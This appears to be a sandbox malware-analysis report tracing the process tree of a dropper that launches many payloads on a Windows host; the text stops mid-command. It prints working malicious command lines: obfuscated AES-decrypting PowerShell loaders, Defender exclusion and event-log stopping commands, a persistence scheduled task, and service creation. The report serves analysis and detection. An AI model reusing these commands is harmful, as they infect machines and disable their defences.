PID 4128 wrote to memory of 4348	4128	New Text Document mod.exe	102
PID 4128 wrote to memory of 4620	4128	New Text Document mod.exe	106
PID 4128 wrote to memory of 4620	4128	New Text Document mod.exe	106
PID 4128 wrote to memory of 4620	4128	New Text Document mod.exe	106
PID 4128 wrote to memory of 2156	4128	New Text Document mod.exe	107
PID 4128 wrote to memory of 2156	4128	New Text Document mod.exe	107
PID 4128 wrote to memory of 2156	4128	New Text Document mod.exe	107
PID 4128 wrote to memory of 1948	4128	New Text Document mod.exe	108
PID 4128 wrote to memory of 1948	4128	New Text Document mod.exe	108
PID 4128 wrote to memory of 1948	4128	New Text Document mod.exe	108
PID 4128 wrote to memory of 212	4128	New Text Document mod.exe	109
PID 4128 wrote to memory of 212	4128	New Text Document mod.exe	109
PID 4128 wrote to memory of 212	4128	New Text Document mod.exe	109
PID 1948 wrote to memory of 2976	1948	may.exe	110
PID 1948 wrote to memory of 2976	1948	may.exe	110
PID 1948 wrote to memory of 2976	1948	may.exe	110
PID 4128 wrote to memory of 2452	4128	New Text Document mod.exe	111
PID 4128 wrote to memory of 2452	4128	New Text Document mod.exe	111
PID 4128 wrote to memory of 2452	4128	New Text Document mod.exe	111
PID 4128 wrote to memory of 5028	4128	New Text Document mod.exe	115
PID 4128 wrote to memory of 5028	4128	New Text Document mod.exe	115
PID 4128 wrote to memory of 5028	4128	New Text Document mod.exe	115
PID 5028 wrote to memory of 3808	5028	288c47bbc1871b439df19ff4df68f07666.exe	116
PID 5028 wrote to memory of 3808	5028	288c47bbc1871b439df19ff4df68f07666.exe	116
PID 5028 wrote to memory of 3808	5028	288c47bbc1871b439df19ff4df68f07666.exe	116
PID 5028 wrote to memory of 808	5028	288c47bbc1871b439df19ff4df68f07666.exe	117
PID 5028 wrote to memory of 808	5028	288c47bbc1871b439df19ff4df68f07666.exe	117
PID 5028 wrote to memory of 808	5028	288c47bbc1871b439df19ff4df68f07666.exe	117
PID 5028 wrote to memory of 4360	5028	288c47bbc1871b439df19ff4df68f07666.exe	118
PID 5028 wrote to memory of 4360	5028	288c47bbc1871b439df19ff4df68f07666.exe	118
PID 4128 wrote to memory of 2956	4128	New Text Document mod.exe	119
PID 4128 wrote to memory of 2956	4128	New Text Document mod.exe	119
PID 4128 wrote to memory of 2956	4128	New Text Document mod.exe	119
PID 2956 wrote to memory of 4964	2956	installer.exe	120
PID 2956 wrote to memory of 4964	2956	installer.exe	120
PID 2956 wrote to memory of 4964	2956	installer.exe	120
PID 4964 wrote to memory of 2616	4964	installer.tmp	121
PID 4964 wrote to memory of 2616	4964	installer.tmp	121
PID 4964 wrote to memory of 4508	4964	installer.tmp	123
PID 4964 wrote to memory of 4508	4964	installer.tmp	123
PID 4964 wrote to memory of 448	4964	installer.tmp	125
PID 4964 wrote to memory of 448	4964	installer.tmp	125
PID 808 wrote to memory of 2908	808	288c47bbc1871b439df19ff4df68f076.exe	127
PID 808 wrote to memory of 2908	808	288c47bbc1871b439df19ff4df68f076.exe	127
PID 808 wrote to memory of 2908	808	288c47bbc1871b439df19ff4df68f076.exe	127
PID 808 wrote to memory of 2908	808	288c47bbc1871b439df19ff4df68f076.exe	127
PID 808 wrote to memory of 2908	808	288c47bbc1871b439df19ff4df68f076.exe	127
PID 808 wrote to memory of 2908	808	288c47bbc1871b439df19ff4df68f076.exe	127
PID 808 wrote to memory of 2908	808	288c47bbc1871b439df19ff4df68f076.exe	127
PID 808 wrote to memory of 2908	808	288c47bbc1871b439df19ff4df68f076.exe	127

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5008	attrib.exe

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4128
- C:\Users\Admin\AppData\Local\Temp\a\june.exe
  "C:\Users\Admin\AppData\Local\Temp\a\june.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:884
- - C:\Users\Admin\AppData\Local\Temp\is-2SCM9.tmp\june.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-2SCM9.tmp\june.tmp" /SL5="$601DC,1513159,56832,C:\Users\Admin\AppData\Local\Temp\a\june.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4712
  - - C:\Users\Admin\AppData\Local\Cruise Mailer\cruisemailer.exe
      "C:\Users\Admin\AppData\Local\Cruise Mailer\cruisemailer.exe" -i
      4⤵
      Executes dropped EXE
      PID:1884
  - - C:\Users\Admin\AppData\Local\Cruise Mailer\cruisemailer.exe
      "C:\Users\Admin\AppData\Local\Cruise Mailer\cruisemailer.exe" -s
      4⤵
      Executes dropped EXE
      PID:856
- C:\Users\Admin\AppData\Local\Temp\a\tupak.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tupak.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:4348
- C:\Users\Admin\AppData\Local\Temp\a\new.exe
  "C:\Users\Admin\AppData\Local\Temp\a\new.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4620
- C:\Users\Admin\AppData\Local\Temp\a\low.exe
  "C:\Users\Admin\AppData\Local\Temp\a\low.exe"
  2⤵
  - Executes dropped EXE
  PID:2156
- C:\Users\Admin\AppData\Local\Temp\a\may.exe
  "C:\Users\Admin\AppData\Local\Temp\a\may.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1948
- - C:\Users\Admin\AppData\Local\Temp\is-Q8U8I.tmp\may.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-Q8U8I.tmp\may.tmp" /SL5="$80172,1667658,56832,C:\Users\Admin\AppData\Local\Temp\a\may.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:2976
- C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe
  "C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:212
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe" & del "C:\ProgramData\*.dll"" & exit
    3⤵
    PID:5796
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:3864
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 212 -s 2440
    3⤵
    - Program crash
    PID:6028
- C:\Users\Admin\AppData\Local\Temp\a\s1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\s1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2452
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://lightminer.co/7171174
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2824
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdcaeb46f8,0x7ffdcaeb4708,0x7ffdcaeb4718
      4⤵
      PID:1116
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,11384362045464719654,11241412467602452400,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
      4⤵
      PID:1420
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,11384362045464719654,11241412467602452400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4400
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,11384362045464719654,11241412467602452400,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
      4⤵
      PID:3000
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11384362045464719654,11241412467602452400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
      4⤵
      PID:1472
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11384362045464719654,11241412467602452400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
      4⤵
      PID:2620
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11384362045464719654,11241412467602452400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1
      4⤵
      PID:5828
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11384362045464719654,11241412467602452400,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
      4⤵
      PID:5836
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11384362045464719654,11241412467602452400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
      4⤵
      PID:6084
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11384362045464719654,11241412467602452400,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
      4⤵
      PID:6092
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,11384362045464719654,11241412467602452400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 /prefetch:8
      4⤵
      PID:4312
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,11384362045464719654,11241412467602452400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5492
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,11384362045464719654,11241412467602452400,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
      4⤵
      PID:3872
- C:\Users\Admin\AppData\Local\Temp\a\288c47bbc1871b439df19ff4df68f07666.exe
  "C:\Users\Admin\AppData\Local\Temp\a\288c47bbc1871b439df19ff4df68f07666.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5028
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:3808
  - - C:\Users\Admin\AppData\Local\Temp\u2xs.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u2xs.0.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:1100
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1100 -s 2452
        5⤵
        Program crash
        
        PID:5956
  - - C:\Users\Admin\AppData\Local\Temp\u2xs.1.exe
      "C:\Users\Admin\AppData\Local\Temp\u2xs.1.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:3632
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        5⤵
        
        PID:2380
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        6⤵
        
        PID:4352
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        6⤵
        Creates scheduled task(s)
        
        PID:4184
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 1152
      4⤵
      Program crash
      PID:724
- - C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
    "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:808
  - - C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
      "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2908
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2600
    - - C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
        
        "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5780
      - C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
        
        "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:6052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:1432
- - C:\Users\Admin\AppData\Local\Temp\FourthX.exe
    "C:\Users\Admin\AppData\Local\Temp\FourthX.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:4360
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5772
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4876
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:5972
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "UTIXDCVF"
      4⤵
      Launches sc.exe
      PID:5252
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:3280
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:908
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "UTIXDCVF"
      4⤵
      Launches sc.exe
      PID:5484
- C:\Users\Admin\AppData\Local\Temp\a\installer.exe
  "C:\Users\Admin\AppData\Local\Temp\a\installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2956
- - C:\Users\Admin\AppData\Local\Temp\is-OTRTB.tmp\installer.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-OTRTB.tmp\installer.tmp" /SL5="$30272,3121405,832512,C:\Users\Admin\AppData\Local\Temp\a\installer.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Users\Admin\AppData\Local\Temp\is-BIJAQ.tmp\netcorecheck_x64.exe
      "C:\Users\Admin\AppData\Local\Temp\is-BIJAQ.tmp\netcorecheck_x64.exe" Microsoft.NETCore.App 3.1.22
      4⤵
      Executes dropped EXE
      PID:2616
  - - C:\Users\Admin\AppData\Local\Temp\is-BIJAQ.tmp\netcorecheck_x64.exe
      "C:\Users\Admin\AppData\Local\Temp\is-BIJAQ.tmp\netcorecheck_x64.exe" Microsoft.NETCore.App 5.0.13
      4⤵
      Executes dropped EXE
      PID:4508
  - - C:\Users\Admin\AppData\Local\Temp\is-BIJAQ.tmp\netcorecheck_x64.exe
      "C:\Users\Admin\AppData\Local\Temp\is-BIJAQ.tmp\netcorecheck_x64.exe" Microsoft.NETCore.App 6.0.11
      4⤵
      Executes dropped EXE
      PID:448
  - - C:\Users\Admin\AppData\Local\Temp\is-BIJAQ.tmp\netcorecheck_x64.exe
      "C:\Users\Admin\AppData\Local\Temp\is-BIJAQ.tmp\netcorecheck_x64.exe" Microsoft.NETCore.App 7.0.0
      4⤵
      Executes dropped EXE
      PID:4636
- C:\Users\Admin\AppData\Local\Temp\a\test.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test.exe"
  2⤵
  - Executes dropped EXE
  PID:1640
- - C:\Users\Admin\AppData\Local\Temp\a\test.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c fortniteselenium.bat
      4⤵
      PID:4252
    - - C:\Users\Admin\AppData\Local\Temp\a\fortniteselenium.bat.exe
        
        "fortniteselenium.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $RSnoU = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\a\fortniteselenium.bat').Split([Environment]::NewLine);foreach ($UvILK in $RSnoU) { if ($UvILK.StartsWith(':: ')) { $WZQKu = $UvILK.Substring(3); break; }; };$DQUpP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($WZQKu);$pJalX = New-Object System.Security.Cryptography.AesManaged;$pJalX.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pJalX.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pJalX.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zS+ZlHHt+ljtBla7JvJQxTuusF08NBCJ+ocKIAkzhxo=');$pJalX.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jxYSFK7YqWUI3KXD43YV1A==');$SZzvF = $pJalX.CreateDecryptor();$DQUpP = $SZzvF.TransformFinalBlock($DQUpP, 0, $DQUpP.Length);$SZzvF.Dispose();$pJalX.Dispose();$DERHC = New-Object System.IO.MemoryStream(, $DQUpP);$wqLxz = New-Object System.IO.MemoryStream;$QljLy = New-Object System.IO.Compression.GZipStream($DERHC, [IO.Compression.CompressionMode]::Decompress);$QljLy.CopyTo($wqLxz);$QljLy.Dispose();$DERHC.Dispose();$wqLxz.Dispose();$DQUpP = $wqLxz.ToArray();$THbqF = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($DQUpP);$dDnhq = $THbqF.EntryPoint;$dDnhq.Invoke($null, (, [string[]] ('')))
        5⤵
        
        PID:5768
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command $RGTVc1 = New-Object System.Security.Cryptography.AesManaged;$RGTVc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$zKteB = $RGTVc1.('rotpyrceDetaerC'[-1..-15] -join '')();$YJUZY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u3vBDix/Dvzu1bNqIQRl5A==');$YJUZY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY, 0, $YJUZY.Length);$YJUZY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY);$FxgyF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qJmctKqd3cKI9f/LSjUTTZfi7VZWgSF/mV4pnIBCY0=');$FxgyF = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FxgyF, 0, $FxgyF.Length);$FxgyF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FxgyF);$uduqT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a/YRTjsaXrUpzDKih9OVYw==');$uduqT = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uduqT, 0, $uduqT.Length);$uduqT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uduqT);$jXIqy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01OluqzYGp7VpcaRAzTEuhBKHeZhEYzImru7nL0XrpTApAAe2nuJWHtDCVSBiU4K+OqG4TWQCs49ZHgcfWfi+euR/Mv2ayGei2SjeZtJc59djoC9/7q0oIcHnQKO86GNcccbBPnosHT1J0+yqZkcMnDYoec6tOMIX+FO2Q7gJAtiDpsPuQ1nyAKZNxGQcDummAmv3RVg1Zz4Pn9Fqbl08BNtgqWHl2Ol+gU/EEu6csFmcl5KvBGR5yLvJJfHyukRx6NQvUT0kUQI4pvttwYdib8yt2A+olytLLxSrFAtLNYm5BpvCwrWZOPOIQBj0Ji4qnEXnkpW34WQnTRiwcH9iRuPL7yUaopjqEQS9uPzd7cMOFQgqqN4qJxPks+ref0tCg6WdX14j1/i0FPbVy2pENJEdQH7+O7bjFDcgWcQDO4=');$jXIqy = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jXIqy, 0, $jXIqy.Length);$jXIqy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jXIqy);$NrSJK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('syA5EvsXvOKxGBhz+CR86w==');$NrSJK = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NrSJK, 0, $NrSJK.Length);$NrSJK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NrSJK);$hNQmD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wiGRZbwj08s5ccnY2fiFog==');$hNQmD = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hNQmD, 0, $hNQmD.Length);$hNQmD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hNQmD);$DkNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PZgrGVa646VrGOS9G04j/Q==');$DkNHQ = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DkNHQ, 0, $DkNHQ.Length);$DkNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DkNHQ);$UJmpm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WdkCE0NfVCsWgdXTOY/C1g==');$UJmpm = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJmpm, 0, $UJmpm.Length);$UJmpm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJmpm);$XAOdY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gPoDSCGApMCmQB1PvehUTQ==');$XAOdY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XAOdY, 0, $XAOdY.Length);$XAOdY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XAOdY);$YJUZY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qOTGlwNsOu7GjN+WYtV3A==');$YJUZY0 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY0, 0, $YJUZY0.Length);$YJUZY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY0);$YJUZY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oYPFDUYl40yftzDaxfoTSw==');$YJUZY1 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY1, 0, $YJUZY1.Length);$YJUZY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY1);$YJUZY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XXjnNR3Sswka2j4WlAp3TQ==');$YJUZY2 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY2, 0, $YJUZY2.Length);$YJUZY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] 